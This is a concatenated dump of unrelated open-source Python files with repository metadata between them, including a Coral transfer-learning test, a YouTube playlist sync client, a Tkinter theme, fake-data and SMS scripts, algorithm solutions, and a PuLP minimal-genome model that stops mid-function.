# train
print('---------------- Start training -----------------')
size = common.input_size(extractor)
for class_id, images in enumerate(train_input):
for image in images:
with test_image(image) as img:
common.set_input(extractor, img.resize(size, Image.NEAREST))
extractor.invoke()
engine.train(classify.get_scores(extractor),
class_id=num_classes + class_id)
print('---------------- Training finished -----------------')
with test_utils.temporary_file(suffix='.tflite') as output_model_path:
output_model_path.write(engine.serialize_model())
# Evaluate
print('---------------- Start evaluating -----------------')
classifier = make_interpreter(output_model_path.name)
classifier.allocate_tensors()
# top[i] represents number of top (i+1) correct inference.
top_k_correct_count = [0] * top_k_range
image_num = 0
for category, image_list in test_set.items():
n = len(image_list)
print('Evaluating {} ({} images)'.format(category, n))
for image_name in image_list:
with test_image(os.path.join(dataset_path, category,
image_name)) as img:
# Set threshold as a negative number to ensure we get top k
# candidates even if its score is 0.
size = common.input_size(classifier)
common.set_input(classifier, img.resize(size, Image.NEAREST))
classifier.invoke()
candidates = classify.get_classes(classifier, top_k=top_k_range)
for i in range(len(candidates)):
candidate = candidates[i]
if candidate.id in labels_map and \
labels_map[candidate.id] == category:
top_k_correct_count[i] += 1
break
image_num += n
for i in range(1, top_k_range):
top_k_correct_count[i] += top_k_correct_count[i - 1]
return [top_k_correct_count[i] / image_num for i in range(top_k_range)]
def _test_oxford17_flowers_single(self, model_path, keep_classes, expected):
top_k_range = len(expected)
ret = self._transfer_learn_and_evaluate(
test_utils.test_data_path(model_path), keep_classes,
test_utils.test_data_path('oxford_17flowers'), 0.25, top_k_range)
for i in range(top_k_range):
self.assertGreaterEqual(ret[i], expected[i])
# Evaluate with L2Norm full model, not keeping base model classes.
def test_oxford17_flowers_l2_norm_model_not_keep_classes(self):
self._test_oxford17_flowers_single(
'mobilenet_v1_1.0_224_l2norm_quant.tflite',
keep_classes=False,
expected=[0.86, 0.94, 0.96, 0.97, 0.97])
# Evaluate with L2Norm full model, keeping base model classes.
def test_oxford17_flowers_l2_norm_model_keep_classes(self):
self._test_oxford17_flowers_single(
'mobilenet_v1_1.0_224_l2norm_quant.tflite',
keep_classes=True,
expected=[0.86, 0.94, 0.96, 0.96, 0.97])
if __name__ == '__main__':
test_utils.coral_test_main()
| 39.437908
| 80
| 0.670036
|
5464a9f02415ec1f1b704a5fb0bbf29e52066acf
| 155
|
py
|
Python
|
preprocessing.py
|
saurabhghatnekar/Iris-dataset-practice
|
b3bdb842c51d3a18a4a2b4a44663f9bf901a9468
|
[
"MIT"
] | null | null | null |
preprocessing.py
|
saurabhghatnekar/Iris-dataset-practice
|
b3bdb842c51d3a18a4a2b4a44663f9bf901a9468
|
[
"MIT"
] | null | null | null |
preprocessing.py
|
saurabhghatnekar/Iris-dataset-practice
|
b3bdb842c51d3a18a4a2b4a44663f9bf901a9468
|
[
"MIT"
] | null | null | null |
import pandas as pd
from io import StringIO
csv_data = \
'''A,B,C,D
1.0,2.0,3.0,4.0
5.0,6.0,,8.0
10.0,11.0,12.0,'''
df = pd.read_csv(StringIO(csv_data))
| 14.090909
| 36
| 0.63871
|
0250f8486ed71d37b29d05c41524c9e87b6ba9c7
| 5,787
|
py
|
Python
|
src/youtube.py
|
j3parker/playlists
|
06710cf3ac5ed03f3280f4925284794184db021c
|
[
"CC0-1.0"
] | null | null | null |
src/youtube.py
|
j3parker/playlists
|
06710cf3ac5ed03f3280f4925284794184db021c
|
[
"CC0-1.0"
] | null | null | null |
src/youtube.py
|
j3parker/playlists
|
06710cf3ac5ed03f3280f4925284794184db021c
|
[
"CC0-1.0"
] | null | null | null |
import google.oauth2.credentials
import google_auth_oauthlib.flow
import googleapiclient.discovery
import googleapiclient.errors
import model
import os
class Client:
"""Interface with YouTube for syncing playlists."""
def __init__(self, client):
self.client = client
self.placeholder_map = {}
def from_environment():
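        # Factory: build a Client from OAuth credentials stored in environment variables.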
creds =google.oauth2.credentials.Credentials(
token = None,
token_uri = 'https://oauth2.googleapis.com/token',
refresh_token = os.environ['REFRESH_TOKEN'],
client_id = os.environ['OAUTH_CLIENT_ID'],
client_secret = os.environ['OAUTH_CLIENT_SECRET'],
)
client = googleapiclient.discovery.build(
'youtube', 'v3',
credentials = creds,
)
return Client(client)
def get_playlists(self):
response = self.list_playlists()
return [
model.Playlist(
playlist['id'],
playlist['snippet']['title'],
playlist['snippet']['description'],
self.get_playlistitems(playlist['id']),
)
for playlist in response['items']
if playlist['status']['privacyStatus'] == 'public'
]
def get_playlistitems(self, id):
response = self.list_playlistitems(id)
return [
model.PlaylistItem(
item['id'],
item['snippet']['playlistId'],
item['contentDetails']['videoId'],
item['snippet']['position'],
)
for item in response['items']
]
def apply(self, op):
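        # Apply a single sync operation (create/update/delete a playlist or playlist item) to YouTube.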
if isinstance(op, model.OpNewPlaylist):
new_id = self.insert_playlist(
title = op.title,
description = op.description,
privacy_status = 'public',
)
self.placeholder_map[op.playlist_id.nonce] = new_id
print(f'Remembering that {op.playlist_id} -> {new_id}')
elif isinstance(op, model.OpUpdatePlaylistMetadata):
self.update_playlist(
playlist_id = op.playlist_id,
title = op.title,
description = op.description,
)
elif isinstance(op, model.OpDeletePlaylist):
self.delete_playlist(
playlist_id = op.playlist_id,
)
elif isinstance(op, model.OpAddToPlaylist):
if isinstance(op.playlist_id, model.PlaceholderId):
playlist_id = self.placeholder_map[op.playlist_id.nonce]
else:
playlist_id = op.playlist_id
self.insert_playlistitem(
playlist_id = playlist_id,
video_id = op.video_id,
position = op.position,
)
elif isinstance(op, model.OpReorderPlaylistItem):
self.update_playlistitem(
item_id = op.item_id,
playlist_id = op.playlist_id,
video_id = op.video_id,
position = op.position,
)
elif isinstance(op, model.OpRemoveFromPlaylist):
self.delete_playlistitem(op.item_id)
else:
raise Exception('unimplemented operation')
def list_playlists(self):
return self.client.playlists().list(
part = 'snippet,status',
mine = True,
maxResults = 50,
).execute()
def insert_playlist(self, title, description, privacy_status):
return self.client.playlists().insert(
part = 'snippet,status',
body = {
'snippet': {
'title': title,
'description': description,
},
'status': {
'privacyStatus': privacy_status,
},
},
).execute()['id']
def update_playlist(self, playlist_id, title, description):
self.client.playlists().update(
part = 'id,snippet',
body = {
'id': playlist_id,
'snippet': {
'title': title,
'description': description,
},
},
).execute()
def delete_playlist(self, playlist_id):
self.client.playlists().delete(playlist_id).execute()
def list_playlistitems(self, id):
return self.client.playlistItems().list(
part = 'contentDetails,snippet',
playlistId = id,
maxResults = 50,
).execute()
def insert_playlistitem(self, playlist_id, video_id, position):
self.client.playlistItems().insert(
part = 'snippet',
body = {
'snippet': {
'playlistId': playlist_id,
'resourceId': {
'kind': 'youtube#video',
'videoId': video_id,
},
'position': position,
},
},
).execute()
def update_playlistitem(self, item_id, playlist_id, video_id, position):
self.client.playlistItems().update(
part = 'snippet',
body = {
'id': item_id,
'snippet': {
'playlistId': playlist_id,
'resourceId': {
'kind': 'youtube#video',
'videoId': video_id,
},
'position': position,
},
},
).execute()
def delete_playlistitem(self, item_id):
        self.client.playlistItems().delete(id = item_id).execute()
| 31.112903
| 76
| 0.507862
|
2bed9b36d5c6415119415401c03586363a01bbff
| 8,037
|
py
|
Python
|
friendly_ground_truth/view/light_theme.py
|
p2irc/friendly_ground_truth
|
69415a435ff46d424bf204894a1691dd2e900fc6
|
[
"MIT"
] | null | null | null |
friendly_ground_truth/view/light_theme.py
|
p2irc/friendly_ground_truth
|
69415a435ff46d424bf204894a1691dd2e900fc6
|
[
"MIT"
] | 139
|
2020-02-23T16:42:10.000Z
|
2021-07-26T23:19:53.000Z
|
friendly_ground_truth/view/light_theme.py
|
p2irc/friendly_ground_truth
|
69415a435ff46d424bf204894a1691dd2e900fc6
|
[
"MIT"
] | null | null | null |
"""
File Name: light_theme.py
Authors: Kyle Seidenthal
Date: 22-05-2020
Description: Light Theme
"""
from tkinter import ttk
colours = {
"toolbar_activate": "#ffde4d",
"pbar_colour": "#2640b5",
"link_colour": "#5978ff",
"bg_level_0": "#d9d9d9",
"fg_level_0": "#000000",
"bg_level_1": "#c4c4c4",
"fg_level_1": "#000000",
"bg_level_2": "#a8a8a8",
"fg_level_2": "#000000",
"bg_level_3": "#919191",
"fg_level_3": "#000000"
}
settings = {
"PersistantToolbar.TButton": {
"configure": {
"background": colours['bg_level_2'],
"foreground": colours['fg_level_2'],
"borderwidth": 2,
"bordercolor": colours['bg_level_2']
},
"map": {
"background": [('pressed', colours['toolbar_activate']),
('disabled', colours['toolbar_activate']),
('active', colours['bg_level_3'])],
"foreground": [],
"relief": [('pressed', 'sunken'), ('disabled', 'sunken'),
('!disabled', 'flat')]
}
},
"Toolbar.TButton": {
"configure": {
"background": colours['bg_level_2'],
"foreground": colours['fg_level_2']
},
"map": {
"background": [('active', colours['bg_level_3'])],
"relief": [('pressed', 'sunken')]
}
},
"Toolbar.TFrame": {
"configure": {
"borderwidth": 1,
"bordercolor": colours['bg_level_2'],
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1']
}
},
"Toolbar.TLabel": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1']
}
},
"TSeparator": {
"configure": {
"background": colours['bg_level_0'],
"foreground": colours['fg_level_0']
}
},
"MenuBar.TMenubutton": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1'],
"bordercolor": colours['bg_level_2'],
"activeforeground": colours['fg_level_2'],
"activebackground": colours['bg_level_2']
}
},
"Menu.TMenubutton": {
"configure": {
"background": colours['bg_level_2'],
"foreground": colours['fg_level_2'],
"bordercolor": colours['bg_level_3'],
"activeforeground": colours['fg_level_3'],
"activebackground": colours['bg_level_3']
}
},
"TFrame": {
"configure": {
"background": colours['bg_level_1']
}
},
"Main.TFrame": {
"configure": {
"background": colours['bg_level_0']
}
},
"TEntry": {
"configure": {
"background": colours['bg_level_3'],
"foreground": colours['fg_level_3']
}
},
"InfoPanel.TLabel": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1'],
"padding": 10
}
},
"InfoPanel.TFrame": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1'],
"bordercolor": colours['bg_level_2'],
}
},
"Horizontal.TProgressbar": {
"configure": {
"background": colours['pbar_colour'],
"foreground": colours['pbar_colour'],
"troughcolor": colours['fg_level_2']
}
},
"InfoPanel.Horizontal.TScale": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1'],
"troughcolor": colours['bg_level_3']
}
},
"Horizontal.TScrollbar": {
"configure": {
"background": colours['bg_level_3'],
"foreground": colours['fg_level_3'],
"highlightcolor": colours['fg_level_3'],
"troughcolor": colours['bg_level_2'],
"bordercolor": colours['bg_level_2']
}
},
"Vertical.TScrollbar": {
"configure": {
"background": colours['bg_level_3'],
"foreground": colours['fg_level_3'],
"highlightcolor": colours['fg_level_3'],
"troughcolor": colours['bg_level_2'],
"bordercolor": colours['bg_level_2']
}
},
"HelpDialog.TLabel": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1']
}
},
"Link.TLabel": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['link_colour']
}
},
"HelpDialog.TFrame": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1']
}
},
"KeyboardGroup.TFrame": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['bg_level_2'],
"padding": 10
}
},
"TButton": {
"configure": {
"background": colours['bg_level_2'],
"foreground": colours['fg_level_2']
},
"map": {
"background": [('active', colours['bg_level_3'])],
"relief": [('pressed', 'sunken')]
}
},
"TLabel": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1']
}
},
"TMenuButton": {
"configure": {
"background": colours['bg_level_2'],
"foreground": colours['bg_level_2']
}
},
"TPanedWindow": {
"configure": {
"background": colours['bg_level_3'],
"foreground": colours['fg_level_3']
}
},
"Canvas.TFrame": {
"configure": {
"background": colours['bg_level_0'],
"foreground": colours['fg_level_0']
}
},
"ButtonPanel.TFrame": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1']
}
},
"Preview.TFrame": {
"configure": {
"borderwidth": 3,
"relief": "groove"
}
}
}
style = ttk.Style()
style.theme_create("light_theme", "clam", settings=settings)
| 34.055085
| 73
| 0.393679
|
4aa0146947a7e097243416a89dfd3270d7fb67d1
| 3,226
|
py
|
Python
|
fake-data.py
|
zack-klein/multi-tenant-sqlalchemy
|
99c512be840d99706c32223eeb89b5113615179e
|
[
"MIT"
] | 3
|
2020-12-21T21:09:05.000Z
|
2021-02-01T06:10:06.000Z
|
fake-data.py
|
zack-klein/multi-tenant-sqlalchemy
|
99c512be840d99706c32223eeb89b5113615179e
|
[
"MIT"
] | null | null | null |
fake-data.py
|
zack-klein/multi-tenant-sqlalchemy
|
99c512be840d99706c32223eeb89b5113615179e
|
[
"MIT"
] | null | null | null |
from faker import Faker
from flask import current_app
from flask_appbuilder.security.sqla.models import Role, User
from random import choice, randint
from tqdm import tqdm
from werkzeug.security import generate_password_hash
from app import app
from app.database import db
from app.models import Post, Tenant
def add_user(username, firstname, lastname, email, role, password, tenant_id):
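    # Build a Flask-AppBuilder User with the given role and a hashed password (not yet added to the session).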
user = User()
user.first_name = firstname
user.last_name = lastname
user.password = generate_password_hash(password)
user.username = username
user.email = email
user.active = True
user.roles.append(role)
user.current_tenant_id = tenant_id
return user
def create_fake_data(
num_tenants, num_posts, max_users_per_tenant, min_users_per_tenant,
):
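    # Reset the database, then populate it with fake tenants, users and posts.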
fake = Faker()
db.drop_all()
db.create_all()
current_app.appbuilder.sm.create_db()
current_app.appbuilder.add_permissions(update_perms=True)
current_app.appbuilder.sm.create_db()
# Users & Tenants
# Create an admin first
admin_role = db.session.query(Role).filter(Role.name == "Admin").first()
admin = add_user(
"admin", "admin", "admin", "admin", admin_role, "admin", None
)
users = [admin]
used_usernames = []
tenants = []
public_role = db.session.query(Role).filter(Role.name == "Public").first()
print("Creating tenants...")
for _ in tqdm(range(0, num_tenants)):
this_tenant_users = []
tenant = Tenant(name=fake.company() + " " + fake.job().title() + "s")
this_tenant_users_num = randint(
min_users_per_tenant, max_users_per_tenant
)
# Create users
for _ in range(this_tenant_users_num):
firstname = fake.first_name()
lastname = fake.last_name()
username = f"{firstname}.{lastname}".lower()
email = f"{username}@{fake.word()}.com"
password = username
if username not in used_usernames:
user = add_user(
username,
firstname,
lastname,
email,
public_role,
password,
None,
)
used_usernames.append(username)
this_tenant_users.append(user)
users.append(user)
# Add users for this tenant
this_tenant_users.append(admin)
tenant.users = this_tenant_users
tenants.append(tenant)
db.session.add_all(users)
db.session.commit()
db.session.add_all(tenants)
db.session.commit()
posts = []
for _ in tqdm(range(0, num_posts)):
tenant = choice(tenants)
user = choice(tenant.users)
post = Post(
name=f"{fake.bs()} {fake.word()}".title(),
text="\n\n".join(fake.paragraphs()),
tenant_id=tenant.id,
author_id=user.id,
)
posts.append(post)
db.session.add_all(posts)
db.session.commit()
print("All done!")
with app.app_context():
create_fake_data(
num_tenants=5,
num_posts=1000,
max_users_per_tenant=12,
min_users_per_tenant=2,
)
| 27.109244
| 78
| 0.606634
|
91dc94682bac3b8f91c5b96f6b1f4d3f8e57186e
| 611
|
py
|
Python
|
smsapigateway.py
|
tivisse/yogame
|
a6de2789febf43958ed48bcf4c35f81900262b7a
|
[
"BSD-2-Clause"
] | 2
|
2016-03-22T13:36:22.000Z
|
2016-03-22T13:37:17.000Z
|
smsapigateway.py
|
tivisse/yogame
|
a6de2789febf43958ed48bcf4c35f81900262b7a
|
[
"BSD-2-Clause"
] | null | null | null |
smsapigateway.py
|
tivisse/yogame
|
a6de2789febf43958ed48bcf4c35f81900262b7a
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import urllib2
from urlparse import urlparse
from urllib import quote
class SMSAPIGateway(object):
PASS_MD5 = '85d9ee56e9927912119fbc89de2eb22e'
USERNAME = 'username'
URL = 'https://ssl.smsapi.pl/sms.do?'
TO = '0032471071323'
def send(self, msg):
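        # Build the SMSAPI request URL for an "eco" SMS and send it; failures are printed rather than raised.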
url = '%susername=%s&password=%s&message=%s&to=%s&eco=1&encoding=utf-8' % \
(self.URL, self.USERNAME, self.PASS_MD5, msg, self.TO)
url = quote(url, safe='/:?&=')
try:
print urllib2.urlopen(url).read()
except Exception, e:
print e
if __name__ == "__main__":
SMSAPIGateway().send('Alerte SMS')
| 26.565217
| 78
| 0.657938
|
e81f8b1a30832ba7c4ae67bcadc94a48a22c8d68
| 2,531
|
py
|
Python
|
Algo and DSA/LeetCode-Solutions-master/Python/shortest-palindrome.py
|
Sourav692/FAANG-Interview-Preparation
|
f523e5c94d582328b3edc449ea16ac6ab28cdc81
|
[
"Unlicense"
] | 3,269
|
2018-10-12T01:29:40.000Z
|
2022-03-31T17:58:41.000Z
|
Algo and DSA/LeetCode-Solutions-master/Python/shortest-palindrome.py
|
Sourav692/FAANG-Interview-Preparation
|
f523e5c94d582328b3edc449ea16ac6ab28cdc81
|
[
"Unlicense"
] | 53
|
2018-12-16T22:54:20.000Z
|
2022-02-25T08:31:20.000Z
|
Algo and DSA/LeetCode-Solutions-master/Python/shortest-palindrome.py
|
Sourav692/FAANG-Interview-Preparation
|
f523e5c94d582328b3edc449ea16ac6ab28cdc81
|
[
"Unlicense"
] | 1,236
|
2018-10-12T02:51:40.000Z
|
2022-03-30T13:30:37.000Z
|
# Time: O(n)
# Space: O(n)
# optimized from Solution2
class Solution(object):
def shortestPalindrome(self, s):
"""
:type s: str
:rtype: str
"""
def getPrefix(pattern):
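            # KMP failure function: prefix[i] is the last index of the longest proper prefix of pattern[:i+1] that is also its suffix (-1 if none).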
prefix = [-1] * len(pattern)
j = -1
for i in xrange(1, len(pattern)):
while j > -1 and pattern[j+1] != pattern[i]:
j = prefix[j]
if pattern[j+1] == pattern[i]:
j += 1
prefix[i] = j
return prefix
if not s:
return s
A = s + '#' + s[::-1]
return s[getPrefix(A)[-1]+1:][::-1] + s
# Time: O(n)
# Space: O(n)
class Solution2(object):
def shortestPalindrome(self, s):
"""
:type s: str
:rtype: str
"""
def getPrefix(pattern):
prefix = [-1] * len(pattern)
j = -1
for i in xrange(1, len(pattern)):
while j > -1 and pattern[j+1] != pattern[i]:
j = prefix[j]
if pattern[j+1] == pattern[i]:
j += 1
prefix[i] = j
return prefix
if not s:
return s
A = s + s[::-1]
prefix = getPrefix(A)
i = prefix[-1]
while i >= len(s):
i = prefix[i]
return s[i+1:][::-1] + s
# Time: O(n)
# Space: O(n)
# Manacher's Algorithm
class Solution3(object):
def shortestPalindrome(self, s):
"""
:type s: str
:rtype: str
"""
def preProcess(s):
if not s:
return ['^', '$']
string = ['^']
for c in s:
string += ['#', c]
string += ['#', '$']
return string
string = preProcess(s)
palindrome = [0] * len(string)
center, right = 0, 0
for i in xrange(1, len(string) - 1):
i_mirror = 2 * center - i
if right > i:
palindrome[i] = min(right - i, palindrome[i_mirror])
else:
palindrome[i] = 0
while string[i + 1 + palindrome[i]] == string[i - 1 - palindrome[i]]:
palindrome[i] += 1
if i + palindrome[i] > right:
center, right = i, i + palindrome[i]
max_len = 0
for i in xrange(1, len(string) - 1):
if i - palindrome[i] == 1:
max_len = palindrome[i]
return s[len(s)-1:max_len-1:-1] + s
| 25.565657
| 81
| 0.41288
|
22160d7ba65bccacf6f5e8eb006a656428d9d199
| 937
|
py
|
Python
|
tests/nn/pipe_process/__init__.py
|
aurickq/fairscale
|
909c84462c6c53abcc4c2841d14a9496e6a3e033
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 1,662
|
2020-07-15T21:40:19.000Z
|
2022-03-31T10:45:12.000Z
|
tests/nn/pipe_process/__init__.py
|
aurickq/fairscale
|
909c84462c6c53abcc4c2841d14a9496e6a3e033
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 648
|
2020-07-21T19:00:32.000Z
|
2022-03-30T23:11:41.000Z
|
tests/nn/pipe_process/__init__.py
|
aurickq/fairscale
|
909c84462c6c53abcc4c2841d14a9496e6a3e033
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 170
|
2020-07-16T00:28:01.000Z
|
2022-03-15T19:39:21.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
#
# This source code is licensed under the BSD license found in the
# LICENSE file in the root directory of this source tree.
# Copyright 2019 Kakao Brain
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# tests/__init__.py makes it possible for pytest to import the application without a custom sys.path or PYTHONPATH.
# See also: https://docs.pytest.org/en/latest/goodpractices.html
| 42.590909
| 98
| 0.769477
|
6897ea66bbd379f8199ee09c53bd780db61ebc95
| 321
|
py
|
Python
|
atlas/__init__.py
|
animesh/atlas
|
7c744f9ccaaa0ebf2845b4331969b2fff82575e3
|
[
"BSD-3-Clause"
] | null | null | null |
atlas/__init__.py
|
animesh/atlas
|
7c744f9ccaaa0ebf2845b4331969b2fff82575e3
|
[
"BSD-3-Clause"
] | null | null | null |
atlas/__init__.py
|
animesh/atlas
|
7c744f9ccaaa0ebf2845b4331969b2fff82575e3
|
[
"BSD-3-Clause"
] | null | null | null |
__version__ = "2.6a2"
from .scripts import utils
TAX_LEVELS = ["superkingdom", "phylum", "class", "order", "family", "genus", "species"]
BLAST6 = [
"qseqid",
"sseqid",
"pident",
"length",
"mismatch",
"gapopen",
"qstart",
"qend",
"sstart",
"send",
"evalue",
"bitscore",
]
| 16.05
| 87
| 0.535826
|
e0f7d634c64a75ddd28ac0bcc1edcb79c8c25f7a
| 961
|
py
|
Python
|
algopro/k_biggest_elem.py
|
Mifour/Algorithms
|
77cfafc49bc0130da0f6041b169a15053f81af87
|
[
"MIT"
] | null | null | null |
algopro/k_biggest_elem.py
|
Mifour/Algorithms
|
77cfafc49bc0130da0f6041b169a15053f81af87
|
[
"MIT"
] | null | null | null |
algopro/k_biggest_elem.py
|
Mifour/Algorithms
|
77cfafc49bc0130da0f6041b169a15053f81af87
|
[
"MIT"
] | null | null | null |
import heapq
import random
"""
Solution from AlgoPro
"""
def findKthLargest(nums, k):
return sorted(nums)[len(nums) - k]
def findKthLargest2(nums, k):
return heapq.nlargest(k, nums)[-1]
def findKthLargest3(nums, k):
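    # Quickselect: partition around a random pivot and recurse only into the side containing the k-th largest element.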
def select(list, l, r, index):
if l == r:
return list[l]
pivot_index = random.randint(l, r)
# move pivot to the beginning of list
list[l], list[pivot_index] = list[pivot_index], list[l]
# partition
i = l
for j in range(l + 1, r + 1):
if list[j] < list[l]:
i += 1
list[i], list[j] = list[j], list[i]
# move pivot to the correct location
list[i], list[l] = list[l], list[i]
# recursively partition one side
if index == i:
return list[i]
elif index < i:
return select(list, l, i - 1, index)
else:
return select(list, i + 1, r, index)
return select(nums, 0, len(nums) - 1, len(nums) - k)
print(findKthLargest3([3, 5, 2, 4, 6, 8], 3))
# 5
| 23.439024
| 59
| 0.58897
|
429729dc4c2cad61907c2bb12ddf7a643ddd8222
| 19,073
|
py
|
Python
|
util/minGenome.py
|
Spherotob/iJL208
|
3a0e878963f46742cc9c973327dd24028f67a4d3
|
[
"MIT"
] | 4
|
2020-12-07T04:32:34.000Z
|
2021-07-20T17:42:49.000Z
|
util/minGenome.py
|
Spherotob/iJL208
|
3a0e878963f46742cc9c973327dd24028f67a4d3
|
[
"MIT"
] | null | null | null |
util/minGenome.py
|
Spherotob/iJL208
|
3a0e878963f46742cc9c973327dd24028f67a4d3
|
[
"MIT"
] | 1
|
2021-01-15T13:26:00.000Z
|
2021-01-15T13:26:00.000Z
|
###########################
### SOLVING FOR iJL208 ###
###########################
import json
import pandas as pd
import pulp
import itertools
import pdb
import re
import os
from tqdm import tqdm
def build_MIP_by_Cobrapy(model, growth_rate, essential_genes_file, parameters_file, regulator_genes_file, TU_Json_file, out_path='../data/minGenome', verbose=False, solver='CPLEX', iterations=10):
M = 1000
#Change variable names to comply former names
me = model
mu = growth_rate
eg_f = essential_genes_file
parameters_f = parameters_file
reg_f = regulator_genes_file
############# sets ################################
# TU
with open(TU_Json_file) as data_file:
TUs = json.load(data_file)
# essential genes
essential_genes = pd.read_csv(eg_f,index_col=0)
essential_genes['gene'] = "u_G_" + essential_genes['gene'].astype(str)
essential_genes = essential_genes['gene'].tolist()
# regulator genes
if reg_f != None:
reg_genes = pd.read_csv(reg_f,index_col=0)
reg_genes['gene'] = "u_G_" + reg_genes['gene'].astype(str)
reg_genes = reg_genes['gene'].tolist()
# ############# parameters ################################
df = pd.read_csv(parameters_f,index_col=0)
test_all_genes = df["gene_or_promoter"].tolist()
not_shared = []
for gene in TUs.keys():
if gene not in test_all_genes:
not_shared.append(gene)
df["gene_or_promoter"] = "u_G_" + df["gene_or_promoter"].astype(str)
no_start = df[df['cannot_as_start']==1]["gene_or_promoter"].tolist()
genes = df["gene_or_promoter"].tolist()
end = df[['gene_or_promoter','start']].set_index('gene_or_promoter')\
.T.to_dict('list')
start = df[['gene_or_promoter','start_if_select_as_start']]\
.set_index('gene_or_promoter').T.to_dict('list')
reactions = [r_id.id for r_id in me.reactions]
metabolites = [m_id.id for m_id in me.metabolites]
############# variables ################################
v = pulp.LpVariable.dicts("v", reactions, 0, M, cat='Continuous')
x = pulp.LpVariable.dicts("x", genes, cat='Binary')
y = pulp.LpVariable.dicts("y", genes, cat='Binary')
z = pulp.LpVariable.dicts("z", genes, cat='Binary')
# z can be defined as continuous
############# define model ################################
lp_prob = pulp.LpProblem("MaxDeletion", pulp.LpMaximize)
############# objective ################################
lp_prob += (pulp.lpSum([y[j]*end[j][0] for j in genes])
- pulp.lpSum([x[j]*start[j][0] for j in genes])), "Max_length"
def addReactionIndicator(lp_prob):
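        # Add big-M indicator constraints that force a reaction flux to zero when its GPR (gene-protein-reaction) rule is disabled by the deletion variables z.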
for r in me.reactions:
rgenes = r.genes
GPR = r.gene_reaction_rule
GPR = GPR.replace('\n','')
GPR = GPR.replace('__10__','')
if 's0001' in GPR: continue # not mapped gene in iJO1366
if 'BG12900' in GPR: continue # not mapped gene in iYO844
# pdb.set_trace()
# no genes
if len(rgenes) == 0:
continue
# single gene
# if ('and' and 'AND' and 'or' and 'OR') not in GPR:
if 'and' not in GPR \
and 'AND' not in GPR \
and 'or' not in GPR \
and 'OR' not in GPR:
# print GPR, genes
assert(len(rgenes) == 1)
for gene in rgenes:
gene = gene.id.replace('__10__','')
label = "knockout" + str(gene)
gene = "u_G_" + gene
lp_prob += v[r.id] - (1-z[gene])*M <= 0, \
label + "_UB_" + r.id
lp_prob += v[r.id] - (1-z[gene])*(-M) >= 0, \
label + "_LB_" + r.id
# enzyme complex
elif (('and' or 'AND') in GPR) and (('or' or 'OR') not in GPR):
# print genes
# print GPR
assert(len(rgenes) > 1)
for gene in rgenes:
gene = gene.id.replace('__10__','').replace('(','').replace(')','')
label = "knockout_" + str(gene)
gene = "u_G_" + gene
lp_prob += v[r.id] - (1-z[gene])*M <= 0, \
label + "_UB_" + r.id
lp_prob += v[r.id] - (1-z[gene])*(-M) >= 0, \
label + "_LB" + r.id
# isozymes
elif (('and' or 'AND') not in GPR) and (('or' or 'OR') in GPR):
# print GPR
lp_prob += v[r.id] - M <= 0, "knockout" + r.id + "Ori_UB"
lp_prob += v[r.id] - (-M) >= 0, "knockout" + r.id + "Ori_LB"
assert(len(rgenes) > 1)
lp_prob += v[r.id] - M * pulp.lpSum(1-z['u_G_'+j.id.replace('__10__','')] \
for j in rgenes) <=0, "knockout" + r.id + '_UB'
lp_prob += v[r.id] - (-M) * pulp.lpSum(1-z['u_G_'+j.id.replace('__10__','')] \
for j in rgenes) >=0, "knockout" + r.id + '_LB'
# more complicated GPRs
else:
# print r.id
# print GPR.split(' or ')
proteins = [protein.replace("( ","").replace(" )","").split(' and ')\
for protein in GPR.split(' or ')]
all_proteins = []
for protein in proteins:
mini = []
for prot in protein:
mini.append(prot.replace('(','').replace(')',''))
all_proteins.append(mini)
proteins = all_proteins
commonGenes = set(proteins[0])
# if len(gpr.proteins) > 1:
for protein in proteins[1:]:
commonGenes.intersection_update(protein)
nonCommonGenesList = []
for protein in proteins:
nonCommonGenes = []
for gene in protein:
if gene not in commonGenes:
nonCommonGenes.append(gene)
nonCommonGenesList.append(nonCommonGenes)
for gene in commonGenes:
# gene = gene.id
label = "knockout" + str(gene)
gene = "u_G_" + gene.replace('__10__','').replace('(','').replace(')','')
lp_prob += v[r.id] - (1-z[gene])*M <= 0, \
label + "_UB_" + r.id
lp_prob += v[r.id] - (1-z[gene])*(-M) >= 0, \
label + "_LB_" + r.id
allCombination = list(itertools.product(*nonCommonGenesList))
# print allCombination
# print allCombination
for i,genesC in enumerate(allCombination):
lp_prob += v[r.id] - M * pulp.lpSum(1-z['u_G_'+j.replace('__10__','')] \
for j in genesC) <=0,\
"knockout" + r.id + '_UB_' + str(i)
lp_prob += v[r.id] - (-M) * pulp.lpSum(1-z['u_G_'+j.replace('__10__','')] \
for j in genesC) >=0,\
"knockout" + r.id + '_LB_' + str(i)
############# constraints ################################
if verbose:
print("add reaction indicator")
addReactionIndicator(lp_prob)
def get_S(model,mu):
"""build the stoichiometric matrix at a specific growth rate"""
# intialize to 0
# S = dok_matrix((len(self.metabolites), len(self.reactions)))
S = {}
# populate with stoichiometry
for i, r in enumerate(model.reactions):
for met, value in r._metabolites.items():
#met_index = self.metabolites.index(met)
if met.id not in S:
S[met.id] = {}
if hasattr(value, "subs"):
S[met.id][r.id] = float(value.subs(mu, growth_rate))
else:
S[met.id][r.id] = float(value)
return S
#### M-model constraints
S = get_S(me, mu) # growth rate is 0.3
# print S
